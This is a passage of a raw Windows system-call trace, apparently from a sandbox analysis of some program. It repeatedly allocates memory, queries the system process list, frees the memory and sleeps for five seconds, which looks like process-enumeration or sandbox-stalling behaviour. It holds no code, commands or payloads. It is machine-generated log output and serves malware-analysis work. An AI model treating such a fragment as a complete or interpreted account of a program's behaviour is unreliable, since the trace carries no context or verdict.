BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.845] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.860] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.876] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.891] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.908] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.924] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.938] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.954] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.972] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.985] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.002] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.020] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.033] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.048] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.064] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.079] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.095] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.133] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.140] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.159] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.171] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 